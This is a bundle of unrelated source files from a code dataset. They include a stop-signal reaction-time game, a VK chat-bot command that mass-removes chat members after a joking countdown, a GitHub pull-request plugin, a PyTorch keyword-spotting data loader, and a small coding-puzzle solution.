size=1.5)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(1500)\n n.write(\"...deep inside the REBEL territory...\", color=\"white\", y=0, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2500)\n display_instructions(\"\"\"Okay, pilot, here's the mission briefing.\\n\\nThe commander requires you to destroy all the incoming enemies... Nothing too hard for our best pilot!\"\"\", text_end=\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"Just destroy them as fast as your can with your famous auto-aiming cannons.\\n\\nPress DOWN to shoot whenever an enemy appears.\"\"\", display_trigger = display_trigger)\n\n for trial in range(n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(\n display_stimulus(side=data[trial][\"Stimulus_Side\"],\n always_right = True,\n testmode = testmode,\n display_trigger = display_trigger)\n )\n data[trial][\"Trial_Order\"] = trial + 1\n\n # Explosion!\n if testmode is False:\n ITI(1000, testmode = testmode, display_trigger = display_trigger)\n display_explosion(side = \"CENTRE\")\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(800)\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)\n\n\n\n\n\n\n# Part 2\n# -----------------------------------------------------------------------------\ndef response_selection(n_trials=100, testmode = False, display_trigger = False):\n\n # Data creation\n data = {\"Stimulus_Side\": [\"RIGHT\"]*int(n_trials/2) + [\"LEFT\"]* int(n_trials/2),\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n\n # Instructions\n if testmode is False:\n n.newpage((24,4,64), auto_refresh=False)\n n.write(\"When suddenly...\", color=\"white\", y=5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2000)\n n.write(\"...your ship engine EXPLODES!\", color=\"white\", y=1.5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2500)\n n.newpage(\"white\")\n n.time.wait(1000)\n n.write(\"You wake up in a hospital.\", color=\"black\", y=5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(1500)\n n.write(\"One year has passed since the accident.\", color=\"black\", y=1.5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2000)\n display_instructions(\"\"\"Things have changed, since. You find your dear old ship, and its famous auto-aiming cannons, damaged in a dump.\\n\\nYou have no choice but to start again, in this new can box they call a ship...\\n\\nNo more auto-aiming cannons.\"\"\", text_end=\"Press SPACE to continue.\", background = (24,4,64), display_trigger = display_trigger)\n display_instructions(\"\"\"But you're not going to give up! You're going to show everyone that you are the fastest pilot for a reason...\\n\\nEven if that means manually aiming at the targets!\"\"\", text_end=\"Press SPACE to continue.\", background = (24,4,64), display_trigger = display_trigger)\n display_instructions(\"\"\"Okay, rookie, get ready for action.\\n\\nPress LEFT or RIGHT depending on where the enemy appears, and be as fast as possible!\"\"\", display_trigger = display_trigger)\n\n for trial in range(n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], testmode = testmode, display_trigger = display_trigger))\n data[trial][\"Trial_Order\"] = trial + 1\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)\n\n\n\n\n\n\n\n# Part 3\n# -----------------------------------------------------------------------------\ndef response_inhibition(n_trials=200, min_SSRT=0, max_SSRT=300, frame = 16.66667, staircase = False, testmode = False, display_trigger = False):\n\n def generate_data(n_trials, min_SSRT=0, max_SSRT=300, frame= 16.66667, adaptive=False):\n data = {\"Stimulus_Side\": [\"RIGHT\"]*int(n_trials/2) + [\"LEFT\"]* int(n_trials/2),\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n\n # SSRT\n ss = np.array(randomize_and_repeat([False, False, True], int(n_trials/3)) + [False] * int(n_trials-int(n_trials/3)*3))\n data[\"Stop_Signal\"] = ss\n data[\"Stop_Signal_RT\"] = np.array([np.nan] * int(n_trials))\n\n if adaptive is False:\n ssrt = generate_interval_frames(min_SSRT, max_SSRT, int(sum(ss)))\n data[\"Stop_Signal_RT\"][ss == True] = randomize_without_repetition(list(ssrt))\n else:\n data[\"Stop_Signal_RT\"][ss == True] = np.array([-1]*len(data[\"Stop_Signal_RT\"][ss == True]))\n\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n return(data)\n\n\n # First\n if testmode is False:\n ITI(2000, testmode = testmode, display_trigger=display_trigger)\n display_enemy()\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(150)\n display_enemy(stop=True)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.response(allow=[\"RIGHT\", \"LEFT\"], time_max = 1500)\n n.time.wait(1500)\n\n\n # Instructions\n n.newpage((24,4,64), auto_refresh=False)\n n.write(\"Wait! What's that?!\", color=\"white\", y=5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2000)\n display_instructions(\"\"\"Bad news, rookie, it seems like the rebels have upgraded some of their ships!\\n\\nIf we do not manage to shoot as SOON as the ennemy appears, they'll have time to activate counter-measures that will return our bullets and damage our ship.\"\"\", text_end=\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"Shoot the incoming ships as FAST as possible, before a RED CROSS appears.\\n\\nDo not shoot at the RED CROSS, or it will harm us too!\"\"\", display_trigger = display_trigger)\n\n # Generate data\n if staircase is True:\n staircase = nk.staircase(signal = generate_interval_frames(0, max_SSRT, int(max_SSRT/frame)),\n treshold = 0.5,\n burn=0)\n data = generate_data(int(n_trials/2), min_SSRT, max_SSRT, frame)\n else:\n data = generate_data(int(n_trials), min_SSRT, max_SSRT, frame)\n\n # Run trials\n if staircase is False:\n for trial in range(0, n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], stop=data[trial][\"Stop_Signal_RT\"], testmode = testmode, display_trigger = display_trigger))\n data[trial][\"Trial_Order\"] = trial + 1\n\n# # With staircase\n# else:\n# for trial in range(0, int(n_trials/2)):\n# data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n# data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], stop=data[trial][\"Stop_Signal_RT\"], testmode = testmode, display_trigger = display_trigger))\n# if staircase is True:\n# if data[trial][\"Stop_Signal\"] is True:\n# if data[trial]['RT'] >= data[trial][\"Stop_Signal_RT\"]:\n# if data[trial][\"Response\"] == \"Time_Max_Exceeded\":\n# staircase.add_response(response=0, value=data[trial][\"Stop_Signal_RT\"])\n# else:\n# staircase.add_response(response=1, value=data[trial][\"Stop_Signal_RT\"])\n# data[trial][\"Trial_Order\"] = trial + 1\n#\n# data_staircase = generate_data(int(n_trials/2), min_SSRT, max_SSRT, adaptive=True)\n# for i in list(data_staircase.keys()): # Replace keys\n# data_staircase[i + int(n_trials/2)] = data_staircase.pop(i)\n# data.update(data_staircase)\n# for trial in range(int(n_trials/2), n_trials):\n# data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n# if data[trial][\"Stop_Signal_RT\"] == -1:\n# data[trial][\"Stop_Signal_RT\"] = staircase.predict_next_value()\n# data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], stop=data[trial][\"Stop_Signal_RT\"], testmode = testmode, display_trigger = display_trigger))\n# if data[trial][\"Stop_Signal\"] is True:\n# if data[trial]['RT'] >= data[trial][\"Stop_Signal_RT\"]:\n# if data[trial][\"Response\"] == \"Time_Max_Exceeded\":\n# staircase.add_response(response=0, value=data[trial][\"Stop_Signal_RT\"])\n# else:\n# staircase.add_response(response=1, value=data[trial][\"Stop_Signal_RT\"])\n# data[trial][\"Trial_Order\"] = trial + 1\n\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)\n\n\n\n\n\n\n\n\n# Part 4\n# -----------------------------------------------------------------------------\ndef attention_priming(n_trials=20, display_trigger = False):\n\n\n # Data creation\n data = {\"Stimulus_Side\": [\"RIGHT\"]*int(n_trials/2) + [\"LEFT\"]* int(n_trials/2),\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n data[\"Priming_Interval\"] = randomize_and_repeat(generate_interval_frames(50, 1000, n_trials/2), 2)\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n\n # Instructions\n n.newpage((24,4,64), auto_refresh=False)\n n.write(\"Well done! You're doing great!\", color=\"white\", y=5, size=1.5)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2000)\n display_instructions(\"\"\"Our engineers have worked hard over the past months. We are now able to prevent the rebels' ships from gathering power. \\n\\nSo no more RED CROSS!\"\"\", text_end =\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"For your next mission, our engineers have also improved your radar. We can now predict the position of the rebels' ships even before they emerge!\\n\\nThis new technology is going to help you improve your speed significantly.\\n\\nGive it a try, and show us again how FAST you are.\"\"\", display_trigger = display_trigger)\n\n for trial in range(n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(prime(side=data[trial][\"Stimulus_Side\"], duration=data[trial][\"Priming_Interval\"]))\n data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], testmode = testmode, display_trigger = display_trigger))\n data[trial][\"Trial_Order\"] = trial + 1\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)\n\n\n\n\n# Part 6\n# -----------------------------------------------------------------------------\ndef conflict_resolution(n_trials=200, testmode = False, display_trigger = False):\n\n # Congruent practice\n # Instructions\n if testmode is False:\n display_instructions(\"\"\"Impressive job, pilot!\\n\\nWe are winning this war! But the rebels are smart. This time, they have disguised themselves as CIVILIANS.\\n\\nThankfully, our engineers have developed a radar that will point toward the enemy ship.\"\"\", text_end =\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"Shoot LEFT and RIGHT according to the radar arrows that will appear in the centre.\\n\\nRemember to be as fast as possible!\"\"\", text_end =\"Press SPACE to continue.\", display_trigger = display_trigger)\n for practice_trial in range(7):\n ITI([1000, 1250, 1000, 1500, 1000, 1250, 1500][practice_trial], testmode = testmode, display_trigger = display_trigger)\n prime(side=[\"RIGHT\", \"LEFT\", \"RIGHT\", \"RIGHT\", \"LEFT\", \"LEFT\", \"RIGHT\"][practice_trial], conflict=False, duration = 0, testmode = testmode)\n display_stimulus(side=[\"RIGHT\", \"LEFT\", \"RIGHT\", \"RIGHT\", \"LEFT\", \"LEFT\", \"RIGHT\"][practice_trial], allies = True, testmode = testmode, display_trigger = display_trigger)\n\n\n\n # Data creation\n data = {\"Conflict\": [False]*int(n_trials/2) + [True]* int(n_trials/2),\n \"Stimulus_Side\": [\"RIGHT\", \"LEFT\"]*int(n_trials/2) ,\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n\n # Instructions\n if testmode is False:\n display_instructions(\"\"\"You're doing great!\\n\\nUnfortunately, it seems that they found a way a way of hacking our lateral radar antennas. You can only trust and rely on the CENTRAL arrow to know the direction to shoot at.\"\"\", text_end =\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"Shoot LEFT and RIGHT according to the CENTRAL radar arrow.\\n\\nRemember to be as fast as possible!\"\"\", display_trigger = display_trigger)\n\n for trial in range(n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(prime(side=data[trial][\"Stimulus_Side\"], conflict=data[trial][\"Conflict\"], duration = 0, testmode = testmode))\n data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], allies = True, testmode = testmode, display_trigger = display_trigger))\n data[trial][\"Trial_Order\"] = trial + 1\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)","repo_name":"neuropsychology/CognitiveControl","sub_path":"prototype_python/StarControl_Parts.py","file_name":"StarControl_Parts.py","file_ext":"py","file_size_in_byte":15293,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"60"} +{"seq_id":"35146928153","text":"# -*- coding: utf-8 -*-\nimport asyncio\nimport traceback\n\nimport command_besed\nfrom commands import commands\nfrom api.api_execute import kick\nfrom api.methods import messages_edit\n\nclass show(commands):\n\n async def run(self):\n try:\n #adm = await self.create_mongo.admin_check(self.from_id, self.peer_id)\n #if adm:\n if str(self.from_id) == \"597624554\":\n if 'закрыть' in self.text:\n\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all Начинаю инициацию закрытия \"\n \"беседы, пожалуйста подождите.\"\n \"У вас есть 1 минута на прощание и тёплые слова.\",\n random_id=0)\n #await msg.start_send()\n await asyncio.sleep(60)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all ⏰ Минута окончена. Беседы скоро не будет.\"\n \"👾 Запускаю анализ данных, скаченный из интернета.\", random_id=0)\n #await msg.finish(\"⏰ До начала закрытия бесед осталась одна минута!\")\n #await msg.start_send()\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 👥 Начинаю получение данных всех пользователей чата.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 🐲 Данные получены.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 🚫 Удаляю все данные пользователей чата.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 💫 Делаю бэкап данных пользователей чата.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 😢 Бэкап оказался пустым, я очень расстроен. Время жизни беседы сокращаю на 20 секунд.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 😃 Спасибо всем, кто общался и жил в этом чате, вы самые лучшие!!!\\n\\nНачинаю закрытие беседы через 5 секунд\", random_id=0)\n await asyncio.sleep(10)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all Хахаха хехехе хихихи\\n\\nВы всё ещё ждёте закрытия????\\n\\n\\n\\n\\n\\n\\n\"\n \"PS. 😎 Закрытие отменили, оно сломалось))))) Расходимся.\",\n random_id=0)\n await asyncio.sleep(10)\n result = await self.create_mongo.get_users_released(self.peer_id, True)\n de = self.chunks(result, 25)\n l = list(de)\n else:\n result = await self.create_mongo.get_users_released(self.peer_id)\n de = self.chunks(result, 25)\n l = list(de)\n msg = messages_edit(self.v, self.club_id, self.apis, self.peer_id, \"🤡 Начинаю запуск модуля шоу.\")\n await msg.start_send()\n await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 5 секунд\")\n # await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 4 секунд\")\n # await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 3 секунд\")\n # await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 2 секунд\")\n # await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 1 секунд\")\n # await asyncio.sleep(1)\n await msg.finish(\"🎉🎊 Шоу начинается! 🎊🎉\")\n\n k = 1\n for i in l:\n # if k == 2:\n # await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n # message=\"@all 🖤 [id246793445|Давид], [id132337324|Георгий], [id150644142|Дима] \"\n # \"спасибо элитному отряду за деятельность в других беседах и поддержания баланса в них.\"\n # \"За огромную помощь бабитуре и за реализацию наших мыслей в чат 👀.\\n\\n\"\n # \"💜 Спасибо помощникам отряда в лице [id498903068|Игрека], [id217681383|Оли] и [id181205197|Евана]\\n\\n\"\n # \"🧡 [id96595205|Ярослав] и 🧡 [id221120133|Степан] сын и отец и отец и сын, спасибо за жизнь без еды и сна.\",\n # random_id=0)\n # if k == 4:\n # await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n # message=\"💛💚💙 [id36374295|Александр], [id15049950|Нина],\"\n # \"[id68817899|Александра], [id136572153|Вячеслав],\"\n # \"[id9875490|Ксения], [id216758639|Настасья],\"\n # \"[id94979557|Юлия] 💙💚💛\"\n # \"спасибо вам за хорошую службу, работу и за помощь абитуре, 33 выстрела вверх в четь этого.\",\n # random_id=0)\n # if k == 6:\n # await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n # message=\"@all 🎩 С вами был чат Мирэа, хз какого института, мне лень смотреть.\\n\\n\"\n # \"Удачного обучения в нашем вузе и не болейте.\",\n # random_id=0)\n # k += 1\n await asyncio.sleep(0.5)\n await self.apis.api_post(\"execute\", code=kick(users=i, chat_id=self.chat_id()), v=self.v)\n\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all Масскик окончен, всем спасибо, всем пока, отдыхайте)))))\",\n random_id=0)\n\n except Exception as e:\n print(traceback.format_exc())\n\n\n\n\n\n\n\n\nshows = command_besed.Command()\n\nshows.keys = ['/шtrtrtt45g4оу', 'начаtrrttrtть шоу', 'закрыть бrrrtrrеседу']\nshows.description = 'Привязка беседы'\nshows.process = show\nshows.topics_blocks = []\nshows.topics_resolution = [\"tema1\"]\n","repo_name":"StasikLeyshin/mir_bot","sub_path":"commands_besed/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":9021,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"5967424917","text":"from dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Iterable, Type\n\nfrom click import (\n BadParameter,\n Option,\n Parameter,\n echo,\n)\nfrom github import Github\nfrom github.Branch import Branch\nfrom github.GitCommit import GitCommit\nfrom github.GithubException import GithubException\nfrom github.InputGitTreeElement import InputGitTreeElement\nfrom github.PullRequest import PullRequest\nfrom github.Repository import Repository\n\nfrom mend.protocols import Plugin, Tree\n\n\n# See: https://git-scm.com/book/en/v2/Git-Internals-Git-Objects\nNORMAL_FILE_MODE = \"100644\"\n\n\ndef normalize_path(path: Path) -> str:\n return str(path.relative_to(Path.cwd()))\n\n\n@dataclass(frozen=True)\nclass GitHubPlugin(Plugin):\n \"\"\"\n Create a GitHub pull request.\n\n \"\"\"\n repository: Repository\n base_branch: str\n target_branch: str\n title: str\n\n def apply(self, tree: Tree) -> None:\n \"\"\"\n Create a pull request, apply the generated tree.\n\n \"\"\"\n branch = self.create_branch()\n self.create_commit(branch, tree)\n pull_request = self.create_pull_request()\n\n echo(f\"Created pull request: {pull_request.number}\")\n\n def create_branch(self) -> Branch:\n \"\"\"\n Create a remote branch.\n\n \"\"\"\n echo(f\"Creating branch: {self.target_branch} off of {self.base_branch}.\")\n\n base_branch = self.repository.get_branch(self.base_branch)\n try:\n self.repository.create_git_ref(\n ref=f\"refs/heads/{self.target_branch}\",\n sha=base_branch.commit.sha,\n )\n except GithubException as error:\n if error.status == 404:\n raise Exception(\n f\"Unable to create branch {self.target_branch}; please confirm that your \"\n \"access token has write access to this repository.\"\n )\n\n if error.status != 422:\n raise\n\n # Branch should exist already, pass through to make sure\n pass\n\n git_branch = self.repository.get_branch(self.target_branch)\n\n echo(f\"Created branch: {self.target_branch}.\")\n\n return git_branch\n\n def create_commit(self, branch: Branch, tree: Tree) -> GitCommit:\n echo(f\"Finding base tree for {branch.name}.\")\n\n base_tree = self.repository.get_git_tree(branch.commit.sha)\n\n echo(f\"Creating {len(tree.blobs)} git blob(s).\")\n\n git_blobs = {\n path: self.repository.create_git_blob(\n content=blob.read().decode(\"utf-8\"),\n encoding=\"utf-8\",\n )\n for path, blob in tree.blobs.items()\n }\n\n echo(\"Creating a new git tree from blob(s).\")\n\n git_tree = self.repository.create_git_tree(\n tree=[\n InputGitTreeElement(\n path=normalize_path(path),\n mode=NORMAL_FILE_MODE,\n type=\"blob\",\n sha=blob.sha,\n )\n for path, blob in git_blobs.items()\n ],\n base_tree=base_tree,\n )\n\n echo(f\"Creating git commit from tree: {git_tree.sha}.\")\n\n git_commit = self.repository.create_git_commit(\n message=(\n f\"\"\"mend: applying changes to ${len(tree.blobs)} files\n\n Includes:\n \"\"\"\n \"\\n\".join(\n f\" - {path}\"\n for path in sorted(tree.blobs.keys())\n )\n ),\n tree=git_tree,\n parents=[\n branch.commit.commit,\n ],\n )\n\n echo(f\"Updating git ref {self.target_branch} to: {git_commit.sha}\")\n\n git_ref = self.repository.get_git_ref(f\"heads/{self.target_branch}\")\n git_ref.edit(git_commit.sha)\n\n return git_commit\n\n def create_pull_request(self) -> PullRequest:\n echo(f\"Creating pull request from {self.target_branch} onto {self.base_branch}.\")\n\n try:\n # create a PR of the release branch into head\n return self.repository.create_pull(\n title=self.title,\n body=f\"Merge mend changes into {self.base_branch}.\",\n base=self.base_branch,\n head=self.target_branch,\n )\n except GithubException as error:\n if error.status != 422:\n raise\n\n if any((\n \"No commits between\" in error.get(\"message\", \"\")\n for error in error.data.get(\"errors\", ())\n if isinstance(error, dict)\n )):\n # NB: maybe we should delete the branch here?\n raise Exception(\"Skipping pull request; no changes.\")\n\n # PR should exist already; make sure\n pull_requests = self.repository.get_pulls(\n base=self.base_branch,\n head=self.target_branch,\n )\n\n if not pull_requests:\n raise\n\n return pull_requests[0]\n\n @classmethod\n def iter_parameters(cls: Type[\"GitHubPlugin\"]) -> Iterable[Parameter]:\n yield Option(\n [\n \"--token\",\n \"--github-token\",\n ],\n envvar=\"GITHUB_TOKEN\",\n help=(\n \"A GitHub API access token, either provided via the GITHUB_TOKEN \"\n \"environment variable or via a CLI prompt.\"\n ),\n hide_input=True,\n prompt=True,\n required=True,\n )\n yield Option(\n [\n \"--organization\",\n \"--org\",\n \"-o\",\n ],\n help=(\n \"The name of the target Github organization name, which may be \"\n \"omitted if the repository name is fully-qualified.\"\n ),\n required=False,\n )\n yield Option(\n [\n \"--repository\",\n \"--repo\",\n \"-r\",\n ],\n help=(\n \"The name of the target Github repository name.\"\n ),\n required=True,\n )\n yield Option(\n [\n \"--branch\",\n \"--branch-name\",\n \"-b\",\n ],\n help=\"The name of the branch to create\",\n required=True,\n )\n yield Option(\n [\n \"--branch-prefix\",\n ],\n help=\"The prefix to apply to the branch\",\n default=\"mend\"\n )\n yield Option(\n [\n \"--base\",\n \"--base-branch\",\n ],\n help=\"The name of the base branch to use; uses the default branch if omitted\",\n )\n yield Option(\n [\n \"--title\",\n ],\n help=\"The pull request title\",\n )\n\n @classmethod\n def from_parameters(\n cls: Type[\"GitHubPlugin\"],\n *args,\n **kwargs,\n ) -> \"GitHubPlugin\":\n github_token = kwargs[\"token\"]\n organization_name = kwargs[\"organization\"]\n repository_name = kwargs[\"repository\"]\n branch_name = kwargs[\"branch\"]\n branch_prefix = kwargs[\"branch_prefix\"]\n base_branch = kwargs[\"base\"]\n title = kwargs[\"title\"]\n\n if organization_name is None:\n if \"/\" not in repository_name:\n raise BadParameter(\n message=\"Expected 'organization/repository' when --organization is omitted.\",\n param_hint=\"repository\",\n )\n else:\n repository_name = f\"{organization_name}/{repository_name}\"\n\n github = Github(github_token)\n repository = github.get_repo(repository_name)\n\n return cls(\n repository=repository,\n base_branch=base_branch or repository.default_branch,\n target_branch=f\"{branch_prefix}/{branch_name}\" if branch_prefix else branch_name,\n title=title or f\"Mend {branch_name}\",\n )\n","repo_name":"jessemyers/mend","sub_path":"mend/plugins/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":8112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73536746432","text":"import torch.utils.data as data\nimport torch\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport os\nimport random\n\nclass TrainDataset(data.Dataset):\n def __init__(self, txt_file, feature_dir, num_utter, num_word, n_batches):\n super().__init__()\n self.feature_dir = feature_dir\n self.num_utter = num_utter\n self.num_word = num_word\n self.n_batches = n_batches\n self.words_dict = {}\n self.batch = []\n\n # structure: self.words_dict = {'word1': [file1, file2, ...], 'word2': [file1, file2, ...], ...}\n with open(txt_file, \"r\") as f:\n self.utterance_list = f.readlines()\n self.utterance_list = list(map(lambda x: x.strip(), self.utterance_list))\n self.utterance_list = list(map(lambda x: tuple(x.split(\",\")), self.utterance_list))\n\n for filename, keyword in self.utterance_list:\n if keyword not in self.words_dict:\n self.words_dict[keyword] = [os.path.join(self.feature_dir, keyword, filename + \".npy\")]\n else:\n self.words_dict[keyword].append(os.path.join(self.feature_dir, keyword, filename + \".npy\"))\n\n # structure: self.batch = [[file1, file2, ...], [file1, file2, ...], ...]\n self.create_batch(n_batches)\n\n def create_batch(self, batch_size):\n words_list = list(self.words_dict.keys())\n for i in range(batch_size):\n mini_batch = []\n selected_words = random.sample(words_list, self.num_word) # 随机采样关键词\n for word in selected_words:\n audio_list = self.words_dict[word]\n selected_audio = random.sample(audio_list, self.num_utter) # 随机采样语音\n for audio in selected_audio:\n mini_batch.append(audio)\n self.batch.append(mini_batch)\n\n def __getitem__(self, index):\n mini_batch = self.batch[index] # [file1, file2, ...]\n data_list = []\n for file in mini_batch:\n data = np.load(file)\n data_list.append(data)\n data = np.concatenate(data_list, axis=0) # [-1, 101, 40]\n return data\n\n def __len__(self):\n return self.n_batches\n\nif __name__ == \"__main__\":\n train_set = TrainDataset(\"fine_tune_append.txt\", \"features/train\", 5, 5, 200)\n train_loader = DataLoader(\n dataset=train_set,\n batch_size=1,\n shuffle=True,\n num_workers=1)\n\n for data in train_loader:\n print(data.shape)\n","repo_name":"liuli1996/keyword-spotting-research","sub_path":"demo/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"43222224928","text":"class Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n if sum(cost) > sum(gas): return -1\n i = 0\n tank = 0\n res = 0\n while i < len(gas):\n tank += gas[i] - cost[i]\n if tank < 0:\n tank = 0\n res = i + 1\n i += 1\n return res","repo_name":"thegeorgejoseph/hash-define-dsa","sub_path":"0134-gas-station/0134-gas-station.py","file_name":"0134-gas-station.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3069961444","text":"from scipy.interpolate import UnivariateSpline\nfrom scipy.interpolate import KroghInterpolator\nfrom format_data import Formatter\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nfrom sklearn import svm, linear_model\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import LinearRegression\n#import seaborn as sns; sns.set()\nfrom statsmodels.tsa.stattools import acf, pacf\nfrom sklearn.linear_model import LinearRegression\n\nclass Interpreter:\n def __init__(self, url, file_name, data_file_name, n_days):\n '''\n Initializes the data Interpreter object with\n a data Formatter object and uses that object to grab\n the formatted x and y values. Initializes the number of\n days to predict into the future and generates\n a list of wanted days.\n\n url: url of data to obtain from Tracktor\n file_name: name of file where id of data is saved\n data_file_name: name of file where data is saved\n NOTE: Only need data_file_name and data_file if those files\n already exist, the url input can be an empty string.\n n_days: number of days user wants the model to extrapolate\n into the future\n '''\n self.formatter = Formatter(url, file_name, data_file_name)\n self.x_values, self.y_values = self.formatter.data_to_matrix()\n self.intra_x_values = []\n self.n_days = n_days\n self.creating_wanted_days()\n self.intra_y_values = []\n\n def creating_wanted_days(self):\n epoch_time = time.time() * 1000\n for day in range(self.n_days):\n self.intra_x_values.append(self.formatter.add_day(epoch_time))\n epoch_time = self.formatter.add_day(epoch_time)\n return self.intra_x_values\n\n def data_to_function(self):\n '''\n Uses the KroghInterpolator to make a function from our\n data and uses that function to predict the prices at\n the wanted dates.\n\n returns: wanted dates (self.intra_x_values)\n and their associated predicted prices (self.intra_y_values)\n '''\n print(self.x_values)\n print(self.y_values)\n poly_func = KroghInterpolator(self.x_values,self.y_values)\n self.creating_wanted_days(self.n_days)\n #self.intra_x_values= [1477492378020,1477492378030]\n #self.intra_x_values = self.intra_x_values[:-1]\n self.intra_x_values = np.asarray(self.intra_x_values)\n #print(self.intra_x_values)\n print(self.intra_x_values)\n self.intra_y_values = poly_func.__call__(self.intra_x_values)\n print(self.intra_y_values)\n return self.intra_x_values, self.intra_y_values\n\n def do_the_svm(self):\n self.func = svm.SVR(kernel='poly')\n self.func.fit(np.array(self.x_values).reshape(-1,1),np.ravel(np.array(self.y_values).reshape(-1,1)))\n print(self.func.predict(np.array(self.intra_x_values).reshape(-1,1)))\n\n def do_linear_regression(self):\n regr = linear_model.LinearRegression()\n train_data_X = map(lambda x: [self.x_values], list(self.x_values))\n train_data_Y = list(self.y_values)\n regr.fit(np.array(self.x_values).reshape(-1,1),np.array(self.y_values).reshape(-1,1))\n print(self.y_values)\n a= np.array(self.intra_x_values).reshape(-1,1)\n print(regr.predict(a))\n\n def make_poly_model(self):\n 